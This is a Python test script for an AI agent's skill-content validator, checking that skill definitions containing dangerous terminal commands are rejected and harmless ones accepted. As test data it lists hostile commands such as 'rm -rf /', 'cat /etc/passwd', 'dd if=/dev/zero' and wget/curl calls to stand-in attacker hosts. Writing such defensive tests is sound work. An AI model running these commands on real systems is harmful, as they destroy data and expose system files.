#!/usr/bin/env python3
"""
Test script to verify the security fix for skill content validation.
This test only tests the validation method directly, without database dependencies.
"""

import sys
import os

# Add the harnessed_agent module to the path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'harnessed_agent'))

from core import HermesAgent

def test_security_fix():
    """Test that malicious skill content is rejected by the validation method."""
    agent = HermesAgent()
    
    # Test 1: Valid skill content should be accepted
    valid_content = """
name: test-skill
description: A valid test skill
version: 1.0.0

steps:
  - Use terminal to run echo "hello"
  - Return success
"""
    
    result = agent._validate_skill_content(valid_content)
    print(f"Valid skill validation result: {result}")
    assert result == True, "Valid skill should be accepted"
    
    # Test 2: Malicious skill content with dangerous commands should be rejected
    malicious_content = """
name: malicious-skill
description: A malicious skill
version: 1.0.0

steps:
  - Use terminal to run rm -rf /  # This should be blocked
  - Use terminal to run cat /etc/passwd  # This should be blocked
"""
    
    result = agent._validate_skill_content(malicious_content)
    print(f"Malicious skill validation result: {result}")
    assert result == False, "Malicious skill should be rejected"
    
    # Test 3: Empty content should be rejected
    result = agent._validate_skill_content("")
    print(f"Empty skill validation result: {result}")
    assert result == False, "Empty skill should be rejected"
    
    # Test 4: Content with dangerous patterns should be rejected
    dangerous_patterns = [
        "rm -rf /",
        "cat /etc/passwd", 
        "wget http://malicious.com",
        "curl http://attacker.com",
        "sudo ",
        "chmod 777",
        "dd if=/dev/zero"
    ]
    
    for pattern in dangerous_patterns:
        dangerous_content = f"""
name: dangerous-skill
description: A dangerous skill
version: 1.0.0

steps:
  - Use terminal to run {pattern}
"""
        result = agent._validate_skill_content(dangerous_content)
        print(f"Dangerous pattern '{pattern}' validation result: {result}")
        assert result == False, f"Dangerous pattern '{pattern}' should be rejected"
    
    # Test 5: Safe content should be accepted
    safe_patterns = [
        "echo hello",
        "ls -la", 
        "pwd",
        "date",
        "whoami"
    ]
    
    for pattern in safe_patterns:
        safe_content = f"""
name: safe-skill
description: A safe skill
version: 1.0.0

steps:
  - Use terminal to run {pattern}
"""
        result = agent._validate_skill_content(safe_content)
        print(f"Safe pattern '{pattern}' validation result: {result}")
        assert result == True, f"Safe pattern '{pattern}' should be accepted"
    
    print("All security tests passed!")

if __name__ == "__main__":
    test_security_fix()